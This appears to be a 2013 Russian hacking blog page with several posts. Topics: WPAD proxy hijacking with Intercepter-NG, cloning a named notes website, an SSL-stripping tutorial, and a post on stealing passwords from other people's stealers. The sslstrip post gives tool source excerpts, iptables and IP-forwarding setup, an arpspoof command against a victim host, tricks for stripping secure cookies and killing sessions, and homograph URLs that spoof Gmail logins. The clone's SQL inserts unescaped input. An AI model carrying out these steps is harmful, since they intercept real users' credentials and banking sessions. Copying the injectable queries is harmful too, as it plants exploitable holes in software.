Всё про всё и ничего лишнего!

Воруем пароли с Помощью Прокси & Intercepter-NG [VIDEO]

zloi_volk — Fri, 17 May 2013 01:37:55 GMT

SOFT

CCProxy 7.2 Build 20110328

Перехват WEB трафика через протокол WPAD

zloi_volk — Thu, 16 May 2013 21:20:03 GMT

WPAD — WebProxy Auto-Discovery. Протокол автоматического получения настроек прокси в локальной сети, поддерживается практически всеми веб-браузерами и рядом других приложений.

В кратце суть его работы такова: если клиент использует DHCP для получения IP адреса, то и за урлом с настройкой прокси он обращается к своему DHCP серверу. Если DHCP не настроен на выдачу WPAD конфигурации или в сети не используется DHCP как таковой, то клиент пробует разрешить сетевое имя вида wpad.localdomain используя DNS. Если такое имя не найдено, то делается последняя попытка поиска имени 'WPAD' через NetBios. Если имя не найдено, клиент пробует соединиться напрямую, но если кто-то в сети сказал что он имеет имя 'WPAD', то клиент соединяется по 80 порту на IP ответившего хоста и затем пытается загрузить файл wpad.dat, в котором должны находиться настройки прокси.

С самого начала своего существования WPAD стал брешью в безопасности, потому что позволяет очень легко перехватить поток данных, выдавая себя за легитимный прокси сервер. Не смотря на то, что данная уязвимость существует давно и довольно легко эксплуатируется, эта атака не приобрела большой известности. Причин всего несколько.

Во первых она позволяет перехватывать только веб трафик клиента, и многим проще запустить arp poison и перехватить гораздо больше. Во вторых для ее осуществления хоть и не требуется каких-то сложных манипуляций, но все же необходимо запустить и настроить ряд сервисов:

1. Необходимо зарегистрировать в сети имя 'WPAD'.
2. Необходимо запустить веб-сервер и создать файл wpad.dat.
3. Необходимо запустить прокси-сервер.

Если на Unix это проделывается достаточно быстро, то на Windows выполнение подобных операций требует больше времени и усилий. Дополнительно возникает проблема с переименованием в сети. Довольно подозрительно будет выглядеть компьютер с именем 'WPAD' в сетевом окружении, а если захочется применить инструмент вроде nbtool для того чтобы cкрытно отвечать на запросы имени 'WPAD', то придется остановить netbios ns службу Windows для освобождения 137 udp порта и соответственно отключиться от сети.

Тем не менее, имеется большое количество потенциальных жертв в любой сети, потому что по умолчанию Internet Explorer (а соответственно и Chrome) пытаются автоматически получить настройки прокси средствами WPAD.

В Intercepter-NG проведение атаки на WPAD полностью автоматизировано и проходит за несколько секунд.
Благодаря использованию WinPcap нет нужды прослушивать сокеты или переименовывать собственное netbios имя. Указывать конкретных жертв не требуется, выдача конфигурации происходит всем запросившим.
На выбор можно вручную указать прокси сервер, который будет выдаваться клиентам или использовать встроенный socks. В последнем случае для перехвата трафика кроме самого Intercepter-NG больше ничего не требуется.

Демонстрация работы представлена на следующих видео роликах.

методика полного копирования сайта

zloi_volk — Wed, 15 May 2013 21:49:43 GMT

Сервис онлайн-записочек очень прост, и эта простота дьявольски притягивает. После захода на сайт весь экран браузера становится пустым. Если нажать на пустом месте, то появится «клейкий листочек» - некий квадратик, в котором можно писать текст и затем его редактировать. Также, в углу есть маленький квадратик, нажимая на который можно менять цвет листочка. И есть крестик, которым удаляется записочка. Весь интерфейс выполнен с использованием AJAX, и страница при работе не перегружается. Рабочая поверхность, на которой находятся записочки, называется «доска» (board) и имеет уникальный идентификатор, что отображается в URL. Эту информацию я рассказал, потому что без нее сложно понять статью. Оптимальным вариантом будет, если перед прочтением следующих абзацев ты зайдешь на сайт и сам испробуешь функционал.
Возрождение старой методики

Вернемся к рассмотрению мега-старой методики, которая сейчас снова возрождается. Раньше все сайты были статическими - состояли из HTML-файлов и картинок. Это добро отдавалось браузеру полностью для отображения. Чтобы скопировать сайт с потрохами, нужно было лишь запустить программу, которая открывает все ссылки на сайте и сохраняет все, что отдает сервер. Но затем в мир Веба пришла динамика, и копирование сайта стало задачей чрезвычайно трудной. К примеру, форум с сообщениями. Даже если по нему пройдется бот и сохранит все страницы, – это ничего не даст. Практически весь функционал заброшен в скрипты, которые остаются для нас закрытыми. При этом, тенденции к упрощению функционала не наблюдается и, казалось бы, скопировать сайт стало невозможно. Но тут пришла эра Веб 2.0! Одним из ее аспектов является перенос большой части функционала с серверного уровня на браузерный, на JavaScript... – а ведь он отдается нам в открытом виде! Чем больше система будет работать на стороне браузера, тем меньше кода на сервере – то есть, скрытого от нас кода. Этот маленький участок кода, который можно и самому дописать, – мелочь по сравнению с той частью, что мы без проблем скопируем. Теория может показаться немного непонятной, но после практики все встанет на свои места.

Итак, в качестве примера мной был выбран сайт zapisochki.ru. Много функциональности в нем находится на стороне JavaScript, а на стороне сервера лишь выполняются несколько запросов по сохранению, обновлению и удалению клейких листочков. Если попытаться эмулировать эти запросы, то можно полностью скачать с сайта все остальное. Правда, сначала нужно понять, как работает приложение, какими командами обменивается серверная и клиентская часть, как генерируется первая страница и т.п. Пошагово пройдемся по всему процессу полного клонирования.
Инструменты

Чтобы разобраться с работой сайта, воспользуемся FireFox с установленными тремя плагинами:
Temper Data (https://addons.mozilla.org/en-US/firefox/addon/966) для просмотра, перехвата и изменения запросов;
Web Developer (https://addons.mozilla.org/en-US/firefox/addon/60) для отключения кеша браузера, для просмотра и удаления кукисов;
FireBug (https://addons.mozilla.org/en-US/firefox/addon/1843) для отладки JavaScript и анализа запросов.

Также необходим Offline Browser для скачивания всего сайта (триальная версия есть на www.metaproducts.com/mp/Portable_Offline_Browser.htm или у нас на диске).
Этапы копирования

Копирование сайта «Записочки» состоит со следующих этапов:
Анализ и эмуляция идентификации;
Копирование страницы с записочками;
Анализ протокола обмена клиентской части с серверной;
Анализ генерации главной страницы;
Программинг серверной части.

В результате мы получим полностью рабочий сайт zapisochki.ru у себя на локальном сервере.
Анализ идентификации

Перед копированием разберемся с идентификацией юзера, ведь у каждого своя страница с клейкими листочками, и нужно знать, какому юзеру какие записочки отображать. Перед началом анализа я, с помощью плагина Web Developer, удалил все кукисы для чистоты эксперимента. Включив Temper Data, я загрузил zapisochki.ru, – на что сервер вернул код переадресации 302 на zapisochki.ru/много_цифр/, да и еще бросил кукисы с каким-то логином и паролем. Я попробовал удалить пришедшие кукисы и загрузил zapisochki.ru/много_цифр/. Даже без логина и пароля, что были в кукисах, страничка нормально отобразилась. Делаем вывод, что идентификация происходит именно по этих циферкам в URL, а логин и пароль требуются лишь для внутренних нужд сайта.

Теперь можно копировать сайт и реализовать идентификацию. Для этого я быстро создал на Денвере хост с многозначительным названием «z». Для эмуляции главной странички – набросал скрипт, который при заходе на сайт «z» будет проверять кукисы. Если они есть, то, исходя из них, юзер будет переброшен на ту доску, которая прописана у него в кукисах.

Таким образом, если в оригинале в кукисах хранятся логин и пароль, по которым уже показываются записочки, то мы немного все упростим и будем хранить идентификатор доски. Записочки будут привязаны к этому идентификатору. Да, это не совсем правильно со стороны безопасности, но нам главное получить рабочий сайт, а доводкой уже можно заниматься потом.

Итак, мы можем написать маленький скрипт, который будет эмулировать идентификацию, как указано выше. Этим скриптом мы эмулировали функциональность, связанную с идентификацией. Пора приступить к следующему этапу.
Offline Explorer в работе

Рассмотрим копирование функциональности самих листочков. Перейдем на сайт zapisochki.ru/много_цифр/, создадим несколько разных записок и попробуем скопировать HTML-страницу со всей обвязкой. Конечно, можно все это и вручную проделать, – смотреть, какие файлы загружаются вместе со страничкой, и потом их копировать по одному – но лучше воспользоваться инструментом для создания фейков, а именно Offline Browser. Запустим его и в качестве исходного URL зададим zapisochki.ru/много_цифр/. Пара кликов на Next – и сайт полностью сохранен. После этого воспользуемся функцией экспорта и сохраним результат. В каталоге экспорта появилась папка с названием zapisochki.ru, а в ней, в папке themes, – все нужные картинки, скрипты и пр. Также там есть папка «много_цифр», а в ней один файлик с названием default.htm.

Далее я скопировал в Денвер папки themes и «много_цифр», а default.htm переименовал на index.php. Если зайти в браузере на http://z/много_буковок/, то отобразится страничка с нашими закладками, правда, не все пока работает. Почему-то не двигаются закладки. Сейчас исправим…
FireBug vs. Offline Explorer

Откроем наш FireBug и активируем весь функционал, например, нажав на вкладке «Net». Поставим везде галочки и нажмем «Применить». Теперь, когда перейдем на вкладку «Console», там пишется что-то типа «ошибка с dragdrop». Тут нужно отлаживать JavaScript, смотреть, в чем проблема, но я воспользовался другой методикой, и она сработала! Я открыл скачанный default.htm и в поиске ввел «dragdrop» - курсор переместился на строчку:

Код

Сразу в глаза бросается, что после scriptaculous.js идет «@», хотя в теории должен быть «?» (это же Get-запрос). Понятно, что так сделал Offline Browser, чтобы превратить динамически сайт в статический, но нам оно не нужно. Поэтому возвращаем все назад и заменяем «@» на «?», а файл scriptaculous.js@load=effects,dragdrop переименуем в изначальный - scriptaculous.js. После этого мы увидим, что во вкладе Net в FireBug появились две ошибки номер 404, то есть, двух файлов не было обнаружено, а именно:

effects.js

dragdrop.js

Достать их не проблема! Смотрим в FireBug пути, загружаем с сервера записочек и сохраняем к остальным скриптам. Обновимся и увидим, что все отобразилось, ошибок нет, да и к тому же, все функции с записочками стали нормально работать. Один из этапов выполнен.
Удаление лишнего

Красоту немного портит «разьехавшийся» дизайн – будем исправлять! Если нажать на «инспектора» в FireBug и навести на наше меню, то увидим, что это все одна таблица. Нам ее не жалко, заходим в исходник страницы и удаляем все между тегами , да и сами теги также. После обновления наблюдаем идеальный минималистский дизайн.

Но в «Console» FireBug опять появились ошибки. На этот раз – в файле sticker.js. Также там возле ошибки указывается номер проблемной строки. Если перейти на нее, а потом удалить строку, то после обновления ошибки больше не будет. Вот так, иногда удаление бывает эффективнее создания.
Протокол обмена

Записочки двигаются, текст и цвет меняется, однако, все это не сохраняется. Давай разберемся в протоколе обмена, чтобы в будущем его эмулировать. Откроем наши записочки в FireBug с вкладкой Console. Будем пробовать записочки в действии. Нажмем на пустом месте – появляется пустая записка. Теперь введем любой текст и выставим цвет. Видим, что браузер послал запрос:

Код

Post

board: 70012862175107245171625585615874

color: 1

id:

text: sometext

x: 123.1

y: 543.2

Причем, переменная board берется с начала нашего файла default.htm, где есть строчка:

var board = '70012862175107245171625585615874';

Это важно, ведь потом данную строчку будет генерировать скрипт. Также видим, что id передается пустым, а в результате сервер возвращает число. Если изменить какой-то параметр записочки (цвет, расположения или текст), то посылается такой же запрос, только id становится не пустым. Из этого можно сделать вывод, что, если id пустое, то сервер создает в базе новую запись о записочке и возвращает клиенту ее идентификатор. В противном случае изменяются в базе параметры той записочки, идентификатор которой передается. Посмотрев на default.htm, видим строку:

var saveURL = '../noteboard/save/';

– она определяет путь к файлу, что обрабатывает сохранение, но мы его изменим на:

var saveURL = '../save.php';

Написанием этого файла займемся позже. Теперь рассмотрим удаление. Если нажать на крестик, то в FireBug появится такой запрос:

POST /NoteBoard/delete/37094

Видим, что при удалении в запросе указывается id записочки. URL, по которому будет отослан запрос, так же, как и для сохранения хранится в default.htm:

var deleteURL = '../noteboard/delete/';

Хотя это несколько неудобно, ведь нужно настраивать .htaccess для таких запросов. Поэтому упростим алгоритм, изменив URL на:

var deleteURL = '../delete.php?';

С этого времени запросы всегда будут обращаться на файл delete.php, а id листочка –приходить как GET-параметр. Мы знаем протокол обмена между сервером и клиентом и уже можем написать сценарии save.php и delete.php, но оставим программерскую часть на потом. Ведь у нас осталась еще генерация первой страницы. То есть, когда уже страница загрузилась, дальше всю работу по прорисовке берет на себя JavaScript. Но первый раз страницу нужно генерировать. А именно – вверху, в переменную board, вписать тот идентификатор, по которому пришел юзер.
Формирование записочек

Если посмотреть в конец исходника default.htm, то можно увидеть следующее:

Код

Нам нужно взять из базы «записочки» данные и потом их выводить как textarea, где в стиле прописывать позицию в параметры left и top, в z-index писать цвет, а в id - идентификатор записочки. Также между тегами

надо вписать текст. Программирование Теперь мы знаем, как генерировать первую страницу, как обрабатывать AJAX-запросы от JavaScript и можем начать последний этап - программирование. В качестве языка был выбран PHP. Нам требуется сделать четыре файла: .htaccess, index.php, save.php, delete.php. В .htaccess пропишем правила перенаправления всех несуществующих каталогов к index.php (это нужно, чтобы перехватить запросы на адреса со многими циферками). Файл .htaccess будет следующим: <div class="bbCodeBlock"><div class="bbCodeName" style="padding-left:5px;font-weight:bold;font-size:7pt">Код</div><div class="codeMessage" style="border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight<5?this.style.height:scrollHeight>200?'200px':''+(this.scrollHeight+5)+'px');">RewriteEngine on RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ index.php?$1 [L,QSA]</div></div> Подумаем над проблемой хранения информации. Создадим в MySQL базу данных с одной простой таблицей и следующими полями, выбранными исходя из параметров записочки: <div class="bbCodeBlock"><div class="bbCodeName" style="padding-left:5px;font-weight:bold;font-size:7pt">Код</div><div class="codeMessage" style="border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight<5?this.style.height:scrollHeight>200?'200px':''+(this.scrollHeight+5)+'px');">id - integer, для хранения идентификатора записочки board - bigint, для хранения доски, в которой находится записочка color - tinyint, для хранения цвета x - float, для хранения x-координаты y - float, для хранения y-координаты text - varchar(255), для хранения текста</div></div> Файл save.php очень простой. Он лишь должен уметь принимать Post-данные и генерировать запрос на создание новой записочки: <div class="bbCodeBlock"><div class="bbCodeName" style="padding-left:5px;font-weight:bold;font-size:7pt">Код</div><div class="codeMessage" style="border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight<5?this.style.height:scrollHeight>200?'200px':''+(this.scrollHeight+5)+'px');">INSERT INTO z SET `board`='$board', `text`='$text', `x`='$x', `y`='$y', `color`='$color' – или запрос для обновления уже существующей: UPDATE z SET `board`='$board', `text`='$text', `x`='$x', `y`='$y', `color`='$color' WHERE `id`='$id' Ну а delete.php будет не сложнее: DELETE FROM z WHERE id='$id' AND board='$board'</div></div> Файл index.php, как мы уже обсуждали, нужен для переадресации юзера по его кукисам на необходимую страничку. То есть, он будет «брать» идентификатор доски id, который хранится в кукисах, и выбирать с базы все соответствующие записочки, а дальше выводить тот файл, что мы получили от Offline Browser, и в нем между тегами <form> помещать записочки в формате, который мы определили выше. Все у наших ног На создание сайта у автора ушел, как минимум, месяц, а мы его скопировали за час. И таких сайтов сейчас очень много, так что простор для творчества огромен. Позволю себе напомнить, что вся информация представлена лишь для ознакомления. Если у тебя будут вопросы, то координаты найдешь на моем сайте <a class="link" target="_blank" href="https://wabsity.do.am/go?http://tutamc.com." title="http://tutamc.com." rel="nofollow">http://tutamc.com.</a> Всегда с радостью отвечу и помогу. Вся информация, конечно же, представлена лишь в ознакомительных целях. Не нужно повторять глупости за автором :). WWW Адрес нашего подопытного: <a class="link" target="_blank" href="https://wabsity.do.am/go?http://zapisochki.ru." title="http://zapisochki.ru." rel="nofollow">http://zapisochki.ru.</a> Все дополнения к FireFox: <a class="link" target="_blank" href="https://wabsity.do.am/go?https://addons.mozilla.org." title="https://addons.mozilla.org." rel="nofollow">https://addons.mozilla.org.</a> 
</article>
<article>
<h1>Вскрываем SSL. Перехват данных в защищенных соединениях</h1>
zloi_volk — Wed, 15 May 2013 21:45:36 GMT
Используя мейл, админку или систему электронного банкинга для управления своим счетом, мы полностью доверяемся серверу. Если все данные передаются по защищенному SSL-соединению - о чем радужно сообщает браузер - то и бояться вроде бы нечего. Но так ли это на самом деле? Простая истина: передавать данные в открытом виде – небезопасно. В этом случае они легко могут стать добычей злоумышленника, которому не составит труда перехватить, модифицировать и даже подменить их. Вот почему логины и пароли, а также другие конфиденциальные данные по обычному HTTP не передаются. Вместо этого используется защищенный HTTPS, который работает медленнее, но зато упаковывает данные в криптографический протокол SSL – и те передаются уже в зашифрованном виде. Как устроен SSL? Алгоритм работы SSL построен на использовании пары асимметричных ключей. Открытый ключ раздается всем желающим, и с его помощью шифруются необходимые данные, которые далее можно дешифровать только с помощью закрытого ключа (он есть на сервере). Открытый ключ предоставляется сервером клиенту, причем выдается в составе сертификата (подписывается третьей уполномоченной стороной – так называемым центром сертификации: certificate authority – CA). В любой сертификат входят следующие поля: НА ПЛАШКУ * полное (уникальное) имя владельца сертификата * открытый ключ владельца * дата выдачи цифрового сертификата * дата окончания действия сертификата * полное (уникальное) имя издателя (источника сертификата) * цифровая подпись издателя Существует несколько видов сертификатов. Чтобы удостовериться в подлинности конкретного сайта, используется специально выписанный для него сертификат (Site Certificate). Для проверки подлинности таких сертификатов в свою очередь существуют сертификаты центра сертификации (CA Certificate); они обладают максимальным доверием и встраиваются непосредственно в браузер (их также называют корневыми – Root CA). Помимо этого, существуют промежуточные сертификаты (Intermediate CA), которые также используются для подписи Site Certificate, однако, в отличие от CA Certificate, не гарантируют легитимность сайта и не встраиваются в браузер. Получается, что в самом простом случае вся цепочка состоит из следующих звеньев: «CA Certificate - Intermediate CA - Site Certificate», однако промежуточных сертификатов может быть больше. Так или иначе, проверка подлинности сайта осуществляется с помощью простой рекурсивной процедуры: * сначала проверяется, чтобы крайний в цепочке сертификат был выписан на имя сайта, к которому идет обращение; * проверяется, не просрочен ли сертификат; * в конце проверяется подпись, с помощью которой он подписан. Подпись может принадлежать или корневому сертификату, и это значит, что сертификату можно 100% доверять, или же некоторому промежуточному сертификату. В последнем случае необходимо подняться на уровень выше и выполнить проверку еще раз – и так до тех пор, пока не будет найдена подпись корневого сертификата. Или не будет, что означает: удостоверить в подлинности сайта невозможно. Sslsniff, или как все начиналось Представим такую картину: у нас есть сертификат для нашего сайта xakep.ru; он является последним звеном в цепочке «Root CA - Intermediate CA - Intermediate CA - xakep.ru». Почему бы не попробовать сделать сертификат сайта промежуточным и не подписать с его помощью другой ресурс, например, paypal.com? Все условия проверки для цепочки (Root CA - Intermediate CA - Intermediate CA - xakep.ru - paypal.com) при этом останутся выполненными: * подписи всех сертификатов действительны; * ни один сертификат не просрочен; * корневой сертификат встроен в браузер и обладает полным доверием. Тут одна лишь загвоздка: как же мы выдадим сертификат? У каждого сертификата есть неприметное поле Basic Constraints, которое определяет, принадлежит ли он центру сертификации или нет. Что удивительно, далеко не все центры ранее выставляли ему значение CA=FALSE[S1]. Более того, большинство браузеров даже не утруждались проверкой значения этого поля. Получается, имея на руках действительный сертификат, можно было создать и подписать сертификат для любого другого домена – и браузеры бы даже не заподозрили неладное! Несмотря на многочисленные заявления, что эксплуатировать это невозможно, разработчик Moxie Marlinspike опубликовал рабочую утилиту sslsniff, которая реализовывала простую атаку MITM (Man in the middle), перехватывая весь трафик. Смысл сводился к следующему: * прога перехватывала клиентские запросы на соединение с защищенным HTTPS-сайтом; * сама создавала сертификат для сайта, к которому коннектится клиент, и подписывала его с помощью уже имеющегося сертификата; * со своей стороны устанавливала обычное HTTPS-соединение с нужным сервером и выступала своеобразной проксей, снифая весь трафик. Все, что требовалась для работы – это предоставить sslsniff действительный сертификат. К сожалению, с 2002-го, когда была опубликована утилита, браузеры стали умнее и такой проверкой больше не пренебрегают. Увы, такой способ нам уже не поможет! Продолжение истории - Sslstrip Чтобы разобраться с другим способом, вспомни, как мы обычно попадаем на защищенные страницы. Допустим, ты захотел проверить свой почтовый ящик Gmail. Просто набираешь в адресной строке mail.google.com и попадаешь на защищенную страницу авторизации. Никто не набирает <a class="link" target="_blank" href="https://wabsity.do.am/go?http://," title="http://," rel="nofollow">http://,</a> а уж тем более <a class="link" target="_blank" href="https://wabsity.do.am/go?https://." title="https://." rel="nofollow">https://.</a> Получается, что пользователь попадает на защищенную страницу двумя путями: кликая на ссылки/кнопки или через редиректы. Переход на защищенные ресурсы осуществляется посредством обычного http-протокола, а его, как я уже говорил, легко перехватить. Да, липовый сертификат «на лету» создать не выйдет. Так, может, обойдемся вовсе без сертификата? Зачем его создавать, если есть шанс перехватить запрос на защищенное соединение с сервером и заставить пользователя общаться с нами по самому обычному HTTP? Именно эта идея и легла в основу программы sslstrip, которую на недавней конференции Black Hat DC 2009 представил все тот же хакер Moxie Marlinspike. Предлагаю рассмотреть ее более подробно. Помимо описания, я буду приводить небольшие отрывки исходников на Python'е. В основе, опять же, лежит принцип MITM, позволяющий вклиниться между сервером и клиентом, просматривая проходящий HTTP-трафик. В каждой перехваченной ссылке на защищенной ресурс выполняется замена «https://» на «http://», а исходная и измененная URL заносятся в таблицу соответствия. <div class="bbCodeBlock"><div class="bbCodeName" style="padding-left:5px;font-weight:bold;font-size:7pt">Код</div><div class="codeMessage" style="border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight<5?this.style.height:scrollHeight>200?'200px':''+(this.scrollHeight+5)+'px');">def replaceSecureLinks(self, data): data = DataShuffler.replaceSecureLinks(self, data) data = self.replaceSecureC*****s(data) data = self.replaceCssLinks(data) data = self.replaceSecureFavicon(data) iterator = re.finditer(self.linkExpression, data, re.IGNORECASE) for match in iterator: link = match.group(9) if not link.startswith('http'): logging.debug("Found relative link in secure transmission: " + link) absoluteLink = "http://"+self.serverHost+link absoluteLink = absoluteLink.replace('&', '&') self.secureLinkListener.addLink(absoluteLink); return data</div></div> Как только клиент посылает запрос на соединение с защищенным URL, мы подсовываем ему липовую ссылку, а сами, тем временем, устанавливаем настоящее HTTPS-соединение, выполняя запрос от своего имени. Получив ответ от сервера и опять выполнив замены в линках, отдаем контент пользователю по обычному HTTP-соединению. В результате получается замечательная картинка. Серверу, отдающему весь контент по защищенному каналу, нет никакого дела, от кого приходит подключение, а клиент не получает никаких предупреждений и даже не подозревает, что использует незащищенное соединение. А мы? А мы перехватываем весь трафик. Несколько уловок Чтобы еще больше создать иллюзию, что все безопасно, будем отслеживать запросы favicon (это иконка, отображающаяся в адресной строке браузера непосредственно перед адресом). И когда получаем такой запрос для защищенного соединения, то подсовываем иконку с замочком, которая в обычной ситуации указывает на то, что соединение осуществляется по безопасному каналу. <div class="bbCodeBlock"><div class="bbCodeName" style="padding-left:5px;font-weight:bold;font-size:7pt">Код</div><div class="codeMessage" style="border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight<5?this.style.height:scrollHeight>200?'200px':''+(this.scrollHeight+5)+'px');">def replaceSecureFavicon(self, data): iterator = re.finditer(self.iconExpression, data, re.IGNORECASE) for match in iterator: link = match.group(1) link.replace('http://', 'https://') if not link.startswith('http://'): link = 'http://' + self.serverHost + link self.secureLinkListener.addSecureFavicon(link) self.secureLinkListener.addLink(link) return data</div></div> Проблемы могут возникнуть: * с компрессированным контентом, который сложно парсить; * с безопасными кукисами, которые не передают по незащищенному соединению; * с банально закешированными страницами, в которых мы не можем сделать замену. Как быть? В кукисах нам потребуется убирать security bit в поле в Set-C*****, чтобы плюшки стали передаваться по обычному HTTP. От сжатия контента придется отказаться, удалив в хедерах HTML параметр content encodings (отключаем сжатие), а также if-modified-since (принудительно заставляем сервер отдавать страницу, даже если на ней не было изменений). Другая проблема – сессии. Пропуская этап авторизации, мы можем остаться без логина и пароля. Решение следующее: сессию тоже надо убивать, но нужна осторожность, чтобы не вызвать подозрений. Сессии имеют свойство истекать (заканчиваться), причем не всегда ясно, когда это произойдет. Одно можно сказать почти наверняка: они не истекают посреди активной работы. Поэтому сразу после начала MITM-атаки начинаем модифицировать трафик, проходящий через нас, но не трогаем C*****s в течение какого-то промежутка времени (например, 5 минут). Ждем эти 5 минут, и запоминаем все сессии, которые видели за это время. Если после 5 минут появляется какая-то новая, то получается, она уже долго работает и, если мы ее прибьем, то подозрений это, скорее всего, не вызовет. Вот, в общем-то, и все секреты успеха. Испытаем sslstrip в деле Но довольно лирики. Посмотрим, реально ли утащить чьи-нибудь логины и пароли. Опыты мы будем проводить на виртуальных машинах. Итак, у нас есть небольшая локальная сеть, состоящая из машины жертвы (192.168.1.3), нашей машины (192.168.1.5) и машины, служащей шлюзом в интернет (192.168.1.1). Теперь подготовим плацдарм для атаки. В качестве ОС на своей машине будем использовать популярный дистрибутив BackTrack3 (все то же самое можно проделать и под Виндой, поставив все необходимые программы и настроив систему, но зачем делать лишнюю работу, если кто-то уже сделал ее за тебя?). Итак, загружаем систему и устанавливаем sslstrip: #bt python setup.py install В принципе, можно даже не устанавливать, а запускать sslstrip сразу: #bt python ./sslstrip.py -h - покажет список параметров. Чтобы все заработало, нам нужно немножко подконфигурировать систему. Сперва включим на машине режим перенаправления пакетов (forwarding mode). Делается это следующей командой: #bt echo "1" > /proc/sys/net/ipv4/ip_forward Затем настроим iptables для перенаправления http-трафика: #bt iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort> где <yourListenPort> - порт, которых будет слушать sslstrip, установим его в 8080, например. Теперь можно запустить и сам sslstrip: #bt sslstrip -a -l 8080 -w /root/log.txt Параметр '-a' означает, что мы будем логировать, весь проходящий http-трафик, '-l' указывает порт, который будем слушать, а '-w' задает путь к лог-файлу. Остался последний штрих - необходимо заставить жертву поверить, что мы и есть тот самый шлюз в интернет. Провернем это с помощью утилитки arpspoof: <div class="bbCodeBlock"><div class="bbCodeName" style="padding-left:5px;font-weight:bold;font-size:7pt">Код</div><div class="codeMessage" style="border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight<5?this.style.height:scrollHeight>200?'200px':''+(this.scrollHeight+5)+'px');">arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress> <yourNetworkdDevice> - имя нашей сетевой карты (в нашем случае eth0), <yourTarget> - адрес жертвы, <theRoutersIpAddress> - адрес шлюза #bt arpspoof -i eth0 -t 192.168.1.3 192.168.1.1</div></div> Дождись, пока жертва полезет в инет, и проверяй логи. Нулевая безопасность Как видишь, безопасность SSL можно свести до нуля и превратить защищенное соединение в незащищенное, добавив на участке до пользователя коннект по обычному http-протоколу. Узнав, насколько это просто реализовать, думаю, ты с особой внимательностью будешь относиться к сообщениям браузера об использовании защищенного соединения и посматривать на адресную строку. Ни в коем случае не воспринимай статью, как побуждение к действию! Она лишь призвана показать основные ошибки SSL и HTTP. Немного статистики Moxie Marlinspike запустил sslstrip на tor узле и за 24 часа словил нехилый урожай: * login.yahoo.com - 114 * Gmain - 50 * ticketmaster.com - 42 * rapidshare.com - 14 * Hotmail - 13 * paypal.com - 9 * linkedin.com -9 * facebook.com - 3 Хитрости URL Технику sslstrip вполне реально совместить с так называемыми омографическими атаками. Это атаки, при которых создается схожее имя домена с использованием букв алфавита другого языка – с целью ввести пользователей в заблуждение и создать впечатление, что они переходят на разрешенный веб-сайт. В 2005-м Eric Johanson зарегистрировал доменное имя pаypal.com, которое использует 'a' из кириллицы и выглядит как paypal.com. Что нас не устраивает в такой атаке? Ну, во-первых, она ориентирована на один конкретный сайт, что ограничивает радиус действия. А во-вторых, браузеры научились правильно отображать IDN (Internationalized Domain Names — Интернационализованные Доменные Имена) и добавляют к имени так называемый Punycode - префикс «xn--». Фальшивый paypal.com преобразуется в <a class="link" target="_blank" href="https://wabsity.do.am/go?http://xn--pypal-4ve.com." title="http://xn--pypal-4ve.com." rel="nofollow">http://xn--pypal-4ve.com.</a> Итак, мы не можем использовать .com или любой другой домен первого уровня, ибо браузеры добавят к нему Punycode. Прикинем, какие символы чаще всего встречаются в URL[S2]? Правильно: «. / & ?». Давай этим воспользуемся. Зарегистрируем домен ijjk.cn и получим сертификат для *.ijjk.cn. А потом применим старый трюк с буковками из другого алфавита, очень похожими на / и ? для создания фальшивых URL'ок. Снова запускаем sslsniff, только на этот раз, вместо подмены https на http, будем подменять URL на свои липовые поддомены. Так, <a class="link" target="_blank" href="https://wabsity.do.am/go?https://www.gmail.com/accounts/ServiceLogin" title="https://www.gmail.com/accounts/ServiceLogin" rel="nofollow">https://www.gmail.com/accounts/ServiceLogin</a> становится <a class="link" target="_blank" href="https://wabsity.do.am/go?https://www.google.com/accounts/ServiceLogin?!f.ijjk=." title="https://www.google.com/accounts/ServiceLogin?!f.ijjk=." rel="nofollow">https://www.google.com/accounts/ServiceLogin?!f.ijjk=.</a> Никакого Punycode в последней ссылке не наблюдается. Плюс ко всему, мы обладаем действительным сертификатом для данного домена. Заметить разницу практически невозможно. • Author: Антон Жуков
</article>
<article>
<h1>Как украсть чужой стиллер, фейк (логин и пароль)!!!</h1>
zloi_volk — Wed, 15 May 2013 11:58:14 GMT
Думал думал и надумал выложить этот способ ЗАчем? спросите вы (я не знаю зачем просто делать нечего) Кто ещё не понял что ето всё такое поясню: Это способ наилучший для читера который хочет обезопасить свой комп от нежелательных программ короче ето так сказать среда как банка закрытая в которой сидит паук ядовитый вы паука посадили туда и закрыли  и он не вылезет пока вы сами того не захотите!!!  (пиздим пароли от стиллеров (ломаем стиллеры!!!) и так же проверяем на виртуалке всякую нечесть И так: Скачиваем <a class="link" href="https://wabsity.do.am/go?http://fintgamer.narod2.ru/Intercepter-NG.v093.zip" title="http://fintgamer.narod2.ru/Intercepter-NG.v093.zip" rel="nofollow" target="_blank">Intercepter-NG</a> (самый (крутой (почти)) и простой СНИФФЕР Далее скачиваем <a class="link" href="https://wabsity.do.am/go?http://download.virtualbox.org/virtualbox/4.2.10/VirtualBox-4.2.10-84105-Win.exe" title="http://download.virtualbox.org/virtualbox/4.2.10/VirtualBox-4.2.10-84105-Win.exe" rel="nofollow" target="_blank">Oracle VM VirtualBox</a> Зачем? (ну не на своём же компе испытывать стиллер) И наконец <a class="link" href="https://wabsity.do.am/go?http://fintgamer.narod2.ru/Windows_XP_Sp3_XTreme_Ultimate_Edition_2011_RUS.torrent" title="http://fintgamer.narod2.ru/Windows_XP_Sp3_XTreme_Ultimate_Edition_2011_RUS.torrent" rel="nofollow" target="_blank">Windows XP Xtreme</a> (а зачем винду???) а как без неё вы запустите виртуальную винду? <a class="link" href="https://wabsity.do.am/go?http://fintgamer.narod2.ru/Proxy.exe" title="http://fintgamer.narod2.ru/Proxy.exe" rel="nofollow" target="_blank">Proxy Server</a> (Для тех у кого винда XP) Дальше просто ВИДЕО без видео никак: (Видос HD но без звука так как микро так сказать дешёвый) <div align="center"><script type="text/javascript">_uVideoPlayer({'url':'http://www.youtube.com/watch?v=NnBJUIOIDr8','width':'425','height':'355'},'scr15TV1uCA3Y');</script></div> <div align="center">И помните что делать стиллеры самому плохо а пиздить чужие ХОРОШО!:D</div> 
</article>
<article>
